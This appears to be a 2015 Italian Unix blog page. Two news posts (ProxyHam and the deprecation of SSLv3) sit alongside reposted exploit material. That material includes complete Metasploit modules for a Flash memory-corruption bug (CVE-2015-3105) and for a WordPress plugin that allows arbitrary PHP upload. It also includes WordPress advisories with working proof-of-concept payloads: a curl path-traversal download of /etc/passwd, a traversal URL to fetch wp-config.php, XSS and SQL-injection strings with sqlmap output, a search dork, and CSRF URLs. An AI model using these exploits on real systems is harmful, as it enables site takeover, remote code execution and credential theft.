MondoUnix Unix, Linux, FreeBSD, BSD, GNU, Kernel , RHEL, CentOS, Solaris, AIX, HP-UX, Mac OS X, Tru64, SCO UnixWare, Xenix, HOWTO, NETWORKING, IPV6

3Jul/150

ProxyHam, per navigare in Internet in anonimato

proxyham

Il dispositivo open source si connette al Wi-Fi e trasmette la connessione Internet di un utente con un collegamento radio a un computer lontano dai 1.600 ai 4.000 metri.

Un sistema per cui l'utente anonimo rimane al sicuro a casa a oltre 1.600 metri di distanza dal suo indirizzo IP.
E' ProxyHam, un "proxy hardware" che sarà presentato alla conferenza di hacker DefCon a Las Vegas in agosto. Il sistema utilizza una connessione radio e aggiunge uno strato fisico per nascondere la posizione quando si naviga in Internet. Il dispositivo open source si connette al Wi-Fi e trasmette la connessione Internet di un utente con un collegamento radio da 900 megahertz a un computer lontano dai 1.600 ai 4.000 metri.

ProxyHam, che sarà venduto dal suo costruttore Ben Caudill ai partecipanti del DefCon e insegnerà agli utenti come costruirlo con le istruzioni sul suo sito web e sulla pagina dedicata di Github, è in realtà formato da due dispositivi. La prima parte è una scatola delle dimensioni di un grande dizionario, che contiene un computer Raspberry Pi collegato a una scheda WiFi e una piccola antenna da 900 megahertz.
Questi dispositivi sono destinati a essere inseriti in qualche luogo pubblico, Caudill suggerisce un angolo buio di una biblioteca.
Sull'altra estremità del collegamento radio è possibile inserire un'altra antenna da 900 megahertz nella sua porta Ethernet.

Caudill ritiene che ProxyHam possa proteggere gli utenti sensibili, come i dissidenti e gli informatori, per i quali strumenti come VPN o software di anonimato come Tor non possono garantire sufficiente sicurezza.

Fonti:

http://www.fastweb.it/internet/proxyham-per-navigare-in-internet-in-anonimato/

http://www.wired.com/2015/07/online-anonymity-box-puts-mile-away-ip-address

(47)

28Jun/150

That shot you heard? SSLv3 is now DEAD

sslv3 is now dead

We really, really, really mean it this time: take SSL3 and bury it.

That's the message from the home of all things Internet the Internet Engineering Task Force, which has issued the “take it behind the shed” edict in this RFC.

It's actually only formalising what the IETF and industry already knew: SSLv3 is ancient and insecure, and is the source of problems like BEAST and POODLE.

Major vendors have been expunging the buggy kludge from their code since last year, but RFC 7568 makes killing it off official IETF policy.

It had already signalled its intent in May, and the new document should only affect the handful of terminally-dozy sysadmins who haven't already patched their systems.

“Pragmatically, clients MUST NOT send a ClientHello with ClientHello.client_version set to {03,00}. Similarly, servers MUST NOT send a ServerHello with ServerHello.server_version set to {03,00}. Any party receiving a Hello message with the protocol version set to {03,00} MUST respond with a "protocol_version" alert message and close the connection.”

The RFC also provides a nice, single source record of what's gone wrong with the protocol in nearly-two-decades of life.

The record layer (where POODLE hit) is broken and can't be fixed; its key exchange is vulnerable during renegotiation or session resumption, and can't be fixed; all of its crypto primitives rely on the deprecated SHA-1; and it can't take advantage of security features added to recent versions of TLS.

Farewell, SSLv3, we hope forever.

Fonte: http://www.theregister.co.uk/2015/06/26/that_shot_you_heard_sslv3_is_now_dead/
(56)

28Jun/150

Adobe Flash Player Drawing Fill Shader Memory Corruption

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = GreatRanking
 
  include Msf::Exploit::Remote::BrowserExploitServer
 
  def initialize(info={})
    super(update_info(info,
      'Name'                => 'Adobe Flash Player Drawing Fill Shader Memory Corruption',
      'Description'         => %q{
        This module exploits a memory corruption happening when applying a Shader as a drawing fill
        as exploited in the wild on June 2015. This module has been tested successfully on:
 
        Windows 7 SP1 (32-bit), IE11 and Adobe Flash 17.0.0.188,
        Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 17.0.0.188,
        Windows 8.1, Firefox 38.0.5 and Adobe Flash 17.0.0.188, and
        Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.460.
      },
      'License'             => MSF_LICENSE,
      'Author'              =>
        [
          'Chris Evans', # Vulnerability discovery
          'Unknown', # Exploit in the wild
          'juan vazquez' # msf module
        ],
      'References'          =>
        [
          ['CVE', '2015-3105'],
          ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-11.html'],
          ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/magnitude-exploit-kit-uses-newly-patched-adobe-vulnerability-us-canada-and-uk-are-most-at-risk/'],
          ['URL', 'http://malware.dontneedcoffee.com/2015/06/cve-2015-3105-flash-up-to-1700188-and.html'],
          ['URL', 'http://help.adobe.com/en_US/as3/dev/WSFDA04BAE-F6BC-43d9-BD9C-08D39CA22086.html']
        ],
      'Payload'             =>
        {
          'DisableNops' => true
        },
      'Platform'            => ['win', 'linux'],
      'Arch'                => [ARCH_X86],
      'BrowserRequirements' =>
        {
          :source  => /script|headers/i,
          :arch    => ARCH_X86,
          :os_name => lambda do |os|
            os =~ OperatingSystems::Match::LINUX ||
              os =~ OperatingSystems::Match::WINDOWS_7 ||
              os =~ OperatingSystems::Match::WINDOWS_81
          end,
          :ua_name => lambda do |ua|
            case target.name
            when 'Windows'
              return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF
            when 'Linux'
              return true if ua == Msf::HttpClients::FF
            end
 
            false
          end,
          :flash   => lambda do |ver|
            case target.name
            when 'Windows'
              return true if ver =~ /^17\./ && Gem::Version.new(ver) <= Gem::Version.new('17.0.0.188')
            when 'Linux'
              return true if ver =~ /^11\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.460')
            end
 
            false
          end
        },
      'Targets'             =>
        [
          [ 'Windows',
            {
              'Platform' => 'win'
            }
          ],
          [ 'Linux',
            {
              'Platform' => 'linux'
            }
          ]
        ],
      'Privileged'          => false,
      'DisclosureDate'      => 'May 12 2015',
      'DefaultTarget'       => 0))
  end
 
  def exploit
    @swf = create_swf
 
    super
  end
 
  def on_request_exploit(cli, request, target_info)
    print_status("Request: #{request.uri}")
 
    if request.uri =~ /\.swf$/
      print_status('Sending SWF...')
      send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
      return
    end
 
    print_status('Sending HTML...')
    send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
  end
 
  def exploit_template(cli, target_info)
    swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
    target_payload = get_payload(cli, target_info)
    b64_payload = Rex::Text.encode_base64(target_payload)
    os_name = target_info[:os_name]
 
    if target.name =~ /Windows/
      platform_id = 'win'
    elsif target.name =~ /Linux/
      platform_id = 'linux'
    end
 
    html_template = %Q|<html>
    <body>
    <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
    <param name="movie" value="<%=swf_random%>" />
    <param name="allowScriptAccess" value="always" />
    <param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" />
    <param name="Play" value="true" />
    <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" Play="true"/>
    </object>
    </body>
    </html>
    |
 
    return html_template, binding()
  end
 
  def create_swf
    path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-3105', 'msf.swf')
    swf =  ::File.open(path, 'rb') { |f| swf = f.read }
 
    swf
  end
end

(40)

28Jun/150

WordPress WP-Instance-Rename 1.0 File Download

Title: Arbitrary File download in wordpress plugin wp-instance-rename v1.0
Author: Larry W. Cashdollar, @_larry0
Date: 2015-06-12
Download Site: https://wordpress.org/plugins/wp-instance-rename/
Vendor: Vlajo
Vendor Notified: 2015-06-12
Advisory: http://www.vapid.dhs.org/advisory.php?v=127
Vendor Contact:
Description: WordPress Rename plugin allows you to easily rename the complete WordPress installation. This plugin allows you to rename WordPress database, WordPress directory, change every necessary configuration file, easily from one page.
Vulnerability:
The code in mysqldump_download.php doesn't check that the requested file is within the intended download directory:
 
try{
  $dbname   = $_GET["dbname"];
  $dumpfname = $_GET["dumpfname"];
  $backup_folder = $_GET["backup_folder"];  
}catch (Exception $e){}
 
if(empty($backup_folder)){
  $backup_folder="backup/";
}
echo "$dumpfname";
if (file_exists($dumpfname)) {    
  // zip the dump file  
  $name=$dbname . "_" . date("Y-m-d");  
  $zipfname = $backup_folder.$name.".zip";
  $zip = new ZipArchive();  
  if($zip->open($zipfname,ZIPARCHIVE::CREATE)) 
  {
     $zip->addFile($dumpfname,$dumpfname);
     $zip->close();
  }  
  // read zip file and send it to standard output
  if (file_exists($zipfname)) {
    header('Content-Description: File Transfer');
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename='.basename($zipfname));
    flush();
    readfile($zipfname);
 
CVEID: 2015-4703
OSVDB:
Exploit Code:
  • curl --data "dbname=wp&dumpfname=/etc/passwd&backup_folder=."  http://www.example.com/wp-instance-rename/mysqldump_download.php -o p.zip

(25)

28Jun/150

WordPress Nextend Twitter Connect 1.5.1 Cross Site Scripting

Wordpress “Nextend Twitter Connect”
===================================
Document Title:
===============
WordPress “Nextend Twitter Connect” Plugin Version: 1.5.1 is vulnerable to Reflected XSS (Cross Site Scripting)
 
Download URL:
 
=============
 
https://wordpress.org/plugins/nextend-twitter-connect/
 
Release Date:
 
=============
2015-06-20
 
Vulnerability CVE ID:
 
=====================
CVE-2015-4557
 
Vulnerability Disclosure Timeline:
 
==================================
2015 – 06 – 15 First notified to WordPress.
2015 – 06 – 15 First notified to plugin vendor .
2015 – 06 – 15 First notified to Mitre for CVE number.
2015 – 06 – 16 Vendor publish update for the plugin.
2015 – 06 – 22 Public Disclosure.
 
Discovery Status:
 
=================
 
Published
 
Severity Level:
 
===============
 
High
 
Technical Details, Description & Proof of Concept (PoC):
 
========================================================
 
After installing Wordpress I add the plugin "Nextend Twitter Connect" witch allow you to login Wordpress with Twitter account.
 
During my test I find out that the “redirect_to” parameter is vulnerable to Reflected XSS attack.
http://www.siz.co.il/my.php?i=hvmwzqo0tmjw.png
 
To reach to root of the problem, I took a look in the plugin source code and realized that the “new_Twitter_sign_button” witch located in the file “nextend-Twitter-connect.php”.
 
The problematic function are locate in line 492:
http://www.siz.co.il/my.php?i=bndijzkozjdy.png
 
As you can see in the line 492, the function don’t escapes HTML tags or other dangerous symbols.
 
When attacker injects the Javascript code in the URL the function runs the code, as you can see:
 
http://www.siz.co.il/my.php?i=ni4jzmzjmrni.png
 
And pop the alert window.
 
 
Solution - Fix & Patch:
 
=======================
 
In order to solve this security flaw you need to add the “htmlentities” function. (http://php.net/htmlentities)
 
As you can see in the image:
http://www.siz.co.il/my.php?i=yjz4jmie4m1g.png
 
 
Wordpress “Nextend Google Connect”
===================================
Document Title:
===============
WordPress “Nextend Google Connect” Plugin Version: 1.5.1 is vulnerable to Reflected XSS (Cross Site Scripting)
 
 
Download URL:
 
=============
 
https://wordpress.org/plugins/nextend-google-connect/
 
 
 
Release Date:
 
=============
2015-06-20
 
 
Vulnerability CVE ID:
 
=====================
CVE-2015-4557
 
 
Vulnerability Disclosure Timeline:
 
==================================
2015 – 06 – 15 First notified to WordPress.
2015 – 06 – 15 First notified to plugin vendor .
2015 – 06 – 15 First notified to Mitre for CVE number.
2015 – 06 – 16 Vendor publish update for the plugin.
2015 – 06 – 22 Public Disclosure.
 
 
Discovery Status:
 
=================
 
Published
 
 
Severity Level:
 
===============
 
High
 
 
Technical Details, Description & Proof of Concept (PoC):
 
========================================================
 
After installing Wordpress I add the plugin "Nextend Google Connect" witch allow you to login Wordpress with Google account.
 
During my test I find out that the “redirect_to” parameter is vulnerable to Reflected XSS attack.
http://www.siz.co.il/my.php?i=yzjzqwyn4qo3.png
 
 
To reach to root of the problem, I took a look in the plugin source code and realized that the “new_google_sign_button” witch located in the file “nextend-Google-connect.php”.
 
The problematic function are locate in line 433:
 
http://www.siz.co.il/my.php?i=z4dnntazxkmz.png
 
 
As you can see in the line 433, the function don’t escapes HTML tags or other dangerous symbols.
 
When attacker injects the Javascript code in the URL the function runs the code, as you can see:
 
http://www.siz.co.il/my.php?i=0omtugeig1z0.png
 
 
 
And pop the alert window.
 
 
Solution - Fix & Patch:
 
=======================
 
In order to solve this security flaw you need to add the “htmlentities” function. (http://php.net/htmlentities)
 
As you can see in the image:
http://sizmedia.com/my.php?i=zmnjdljwthmm.png
 
 
Liran Segal (Bugsec Information Security LTD)
 
Regards,
Liran Segal
Penetration Testing
BugSec Cyber & Information Security

(34)

24Jun/150

WordPress Front-end Editor File Upload

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::HTTP::Wordpress
  include Msf::Exploit::FileDropper
 
  def initialize(info = {})
    super(update_info(
      info,
      'Name'           => 'Wordpress Front-end Editor File Upload',
      'Description'    => %q{
          The Wordpress Front-end Editor plugin contains an authenticated file upload
          vulnerability. We can upload arbitrary files to the upload folder, because
          the plugin also uses it's own file upload mechanism instead of the wordpress
          api it's possible to upload any file type.
      },
      'Author'         =>
        [
          'Sammy', # Vulnerability discovery
          'Roberto Soares Espreto <robertoespreto[at]gmail.com>'     # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['OSVDB', '83637'],
          ['WPVDB', '7569'],
          ['URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-front-end-editor-arbitrary-file-upload-vulnerability.html']
        ],
      'Privileged'     => false,
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Targets'        => [['Front-End Editor 2.2.1', {}]],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jul 04 2012'))
  end
 
  def check
    check_plugin_version_from_readme('front-end-editor', '2.3')
  end
 
  def exploit
    print_status("#{peer} - Trying to upload payload")
    filename = "#{rand_text_alpha_lower(5)}.php"
 
    print_status("#{peer} - Uploading payload")
    res = send_request_cgi(
      'method'   => 'POST',
      'uri'      => normalize_uri(wordpress_url_plugins, 'front-end-editor', 'lib', 'aloha-editor', 'plugins', 'extra', 'draganddropfiles', 'demo', 'upload.php'),
      'ctype'    => 'application/octet-stream',
      'headers'  => {
        'X-File-Name' => "#{filename}"
      },
      'data' => payload.encoded
    )
 
    if res
      if res.code == 200
        register_files_for_cleanup(filename)
      else
        fail_with(Failure::Unknown, "#{peer} - Unexpected response, exploit probably failed!")
      end
    else
      fail_with(Failure::Unknown, 'Server did not respond in an expected way')
    end
 
    print_status("#{peer} - Calling uploaded file #{filename}")
    send_request_cgi(
      { 'uri'    => normalize_uri(wordpress_url_plugins, 'front-end-editor', 'lib', 'aloha-editor', 'plugins', 'extra', 'draganddropfiles', 'demo', "#{filename}") },
      5
    )
  end
end

(106)

24Jun/150

WordPress Revslider 4.2.2 XSS / Information Disclosure

| # Title    : WordPress Revslider 4.2.2 Multi Vulnerability
| # Author   : indoushka                                                               
| # email  :indoushka4ever@gmail.com                                                                                                                                                                 
| # Dork     : inurl:admin-ajax.php?action=revslider_show_image -intext:"revslider_show_image"
| # Tested on: windows 8.1 Français V.(Pro)        
| # Download : http://revolution.themepunch.com/                                                  
=======================================
 
XSS :
 
http://www.codekom.com//wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka..Give%20me%20your%20wp-config.php
 
information Disclosure :
 
http://www.codekom.com/wp-content/plugins/revslider/revslider_admin.php
 
http://www.codekom.com/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css
 
Arbitrary File Download Exploit :
 
http://bh-3.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
 
Greetz : 
jericho  http://attrition.org & http://www.osvdb.org/ * packetstormsecurity.com * http://is-sec.org/cc/
Hussin-X * Stake (www.v4-team.com) * D4NB4R * ViRuS_Ra3cH * yasMouh * https://www.corelan.be * exploit4arab.net
---------------------------------------------------------------------------------------------------------------

(101)

24Jun/150

WordPress Google Analyticator 6.4.9.3 CSRF

# Title: Cross-Site Request Forgery in Google Analyticator Wordpress Plugin
v6.4.9.3 before rev @1183563
# Submitter: Nitin Venkatesh
# Product: Google Analyticator Wordpress Plugin
# Product URL: https://wordpress.org/plugins/google-analyticator/
# Vulnerability Type: Cross-Site Request Forgery [CWE-352]
# Affected Versions: v6.4.9.3 before rev @1183563 and possibly earlier
# Tested versions: v6.4.9.3 rev @1168849
# Fixed Version: v6.4.9.3 rev @1183563
# Link to code diff: https://plugins.trac.wordpress.org/changeset/1183563/
# CVE Status: None/Unassigned/Fresh
 
## Product Information:
 
Google Analyticator makes it super easy to view Google Analytics within your WordPress dashboard. This eliminates the need to edit your template code to begin logging. Google Analyticator also includes several widgets for displaying Analytics data in the admin and on your blog.
 
One of the most popular WordPress plugins for Google Analytics! Over 3.5+ million downloads.
 
## Vulnerability Description:
 
The administrative actions allowed by the plugin can be exploited using CSRF which could be used to disrupt the functionality provided by the plugin.
 
## Proof-of-Concept:
 
http://localhost/wp-admin/options-general.php?page=google-analyticator.php&pageaction=ga_clear_cache
 
http://localhost/wp-admin/options-general.php?page=ga_reset
 
## Solution:
 
Upgrade to v6.4.9.3 rev @1183563
 
## Disclosure Timeline:
 
2015-05-30 - Contacted developer via forums.
2015-06-02 - Vulnerability details submitted on the forums on developer's request - https://wordpress.org/support/topic/discovered-security-vulnerabilities-1
2015-06-13 - Re-contacted developer on the forums.
2015-06-18 - Update released.
2015-06-19 - Publishing to Full Disclosure mailing list
 
## Disclaimer:
 
This disclosure is purely meant for educational purposes. I will in no way be responsible as to how the information in this disclosure is used.

(83)

19Jun/150

WordPress NewStatPress 0.9.8 Cross Site Scripting / SQL Injection

# Title: Multiple vulnerabilities in WordPress plugin "NewStatPress"
# Author: Adrián M. F. - adrimf85[at]gmail[dot]com
# Date: 2015-05-25
# Vendor Homepage: https://wordpress.org/plugins/newstatpress/
# Active installs: 20,000+
# Vulnerable version: 0.9.8
# Fixed version: 0.9.9
# CVE: CVE-2015-4062, CVE-2015-4063
 
 Vulnerabilities (2)
=====================
 
(1) Authenticated SQLi [CWE-89] (CVE-2015-4062)
-----------------------------------------------
 
* CODE:
includes/nsp_search.php:94
+++++++++++++++++++++++++++++++++++++++++
for($i=1;$i<=3;$i++) {
    if(($_GET["what$i"] != '') && ($_GET["where$i"] != '')) {
        $where.=" AND ".$_GET["where$i"]." LIKE '%".$_GET["what$i"]."%'";
    }
}
+++++++++++++++++++++++++++++++++++++++++
 
* POC:
http://[domain]/wp-admin/admin.php?where1=agent[SQLi]&limitquery=1&searchsubmit=Buscar&page=nsp_search
 
SQLMap
+++++++++++++++++++++++++++++++++++++++++
./sqlmap.py --cookie="[cookie]" --dbms mysql -u "http://[domain]/wp-admin/admin.php?where1=agent&limitquery=1&searchsubmit=Buscar&page=nsp_search" -p where1
[............]
GET parameter 'where1' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
sqlmap identified the following injection points with a total of 89 HTTP(s) requests:
---
Parameter: where1 (GET)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: where1=agent AND (SELECT * FROM (SELECT(SLEEP(5)))Guji)&limitquery=1&searchsubmit=Buscar&page=nsp_search
---
[12:25:59] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 7.0 (wheezy)
web application technology: Apache 2.2.22, PHP 5.4.39
back-end DBMS: MySQL 5.0.12
+++++++++++++++++++++++++++++++++++++++++
 
 
(2) Authenticated XSS [CWE-79] (CVE-2015-4063)
----------------------------------------------
 
includes/nsp_search.php:128
+++++++++++++++++++++++++++++++++++++++++
for($i=1;$i<=3;$i++) {
    if($_GET["where$i"] != '') { print "<th scope='col'>".ucfirst($_GET["where$i"])."</th>"; }
}
+++++++++++++++++++++++++++++++++++++++++
 
* POC:
http://[domain]/wp-admin/admin.php?where1=<script>alert(String.fromCharCode(88,+83,+83))</script>&searchsubmit=Buscar&page=nsp_search
 
 
 Timeline
==========
2015-05-09: Discovered vulnerability.
2015-05-19: Vendor notification.
2015-05-19: Vendor response.
2015-05-20: Vendor fix.
2015-05-25: Public disclosure.

(171)

19Jun/150

WordPress Church Admin 0.800 Cross Site Scripting

# Exploit Title: Wordpress church_admin Stored XSS
# Date: 21-04-2015
# Exploit Author: woodspeed
# Vendor Homepage: https://wordpress.org/plugins/church-admin/
# Version: 0.800
# OSVDB ID : http://www.osvdb.org/show/osvdb/121304
# WPVULNDB ID : https://wpvulndb.com/vulnerabilities/7999
# Category: webapps
 
1. Description
 
On the registration form the address field is not validated before returning it to the user.
Visiting the Directory page, will show the confirm window.
 
2. Proof of Concept
 
POST /wordpress/index.php/2015/05/21/church_admin-registration-form/
 
 
save=yes&church_admin_register=9d18cf0420&_wp_http_referer=%2Fwordpress%2Findex.php%2F2015%2F05%2F21%2Fchurch_admin-registration-form%2F&first_name%5B%5D=test&prefix%5B%5D=&last_name%5B%5D=test&mobile%5B%5D=%2B3670&people_type_id%5B%5D=1&email%5B%5D=test%40test.test&sex1=male&phone=%2B3670&address=%3Cscript%3Econfirm%28%29%3C%2Fscript%3E&lat=51.50351129583287&lng=-0.148193359375&recaptcha_challenge_field=03AHJ_VuvBRBO1Vts65lchUe_H_c1AuISniJ4rFDcaPyecjg-HypsHSZSfTkCyZMUC6PjVQAkkuFDfpnsKn28LU8wIMxb9nF5g7XnIYLt0qGzhXcgX4LSX5ul7tPX3RSdussMajZ-_N1YQnOMJZj8b5e5LJgK68Gjf8aaILIyxKud2OF2bmzoZKa56gt1jBbzXBEGASVMMFJ59uB9FsoJIzVRyMJmaXbbrgM01jnSseeg-thefo83fUZS9uuqrBQgqAZGYMmTWdgZ4xvrzXUdv5Zc76ktq-LWKPA&recaptcha_response_field=134
 
 
GET /wordpress/index.php/2015/05/21/church_admin-directory/
 
 
  <header class="entry-header">
    <h1 class="entry-title">church_admin directory</h1>  </header><!-- .entry-header -->
  <div class="entry-content">
    <p><a href="http://localhost/wordpress/?download=addresslist&addresslist=d759d84e16&member_type_id=1,2">PDF version</a></p><form name="ca_search" action="" method="POST">
<p><label style="width:75px;float:left;">Search</label><input name="ca_search" type="text"/><input type="submit" value="Go"/><input type="hidden" name="ca_search_nonce" value="99de1bedec"/></p></form><div class="tablenav"><div class="tablenav-pages"><div class="pagination"></div>
</div></div>
<div class="church_admin_address" itemscope itemtype="http://schema.org/Person">
  <div class="church_admin_name_address" >
    <p><span itemprop="name"><strong>test test</strong></span></p>
    <p><span itemprop="address" itemscope itemtype="http://schema.org/PostalAddress"><script>confirm()</script></span></p></div><!--church_admin_name_address-->
  <div class="church_admin_phone_email">
    <p> <a class="email" href="tel:+3670">+3670</a><br/>
    <a class="email"  href="tel:+3670"><span itemprop="telephone">+3670</span></a><br/>
<a class="email" itemprop="email" href="mailto:test@test.test">test@test.test</a><br/>
 
    </p>
 
  </div><!--church_admin_phone_email--> 
 
3. Solution
 
Fixed in version 0.810.

(90)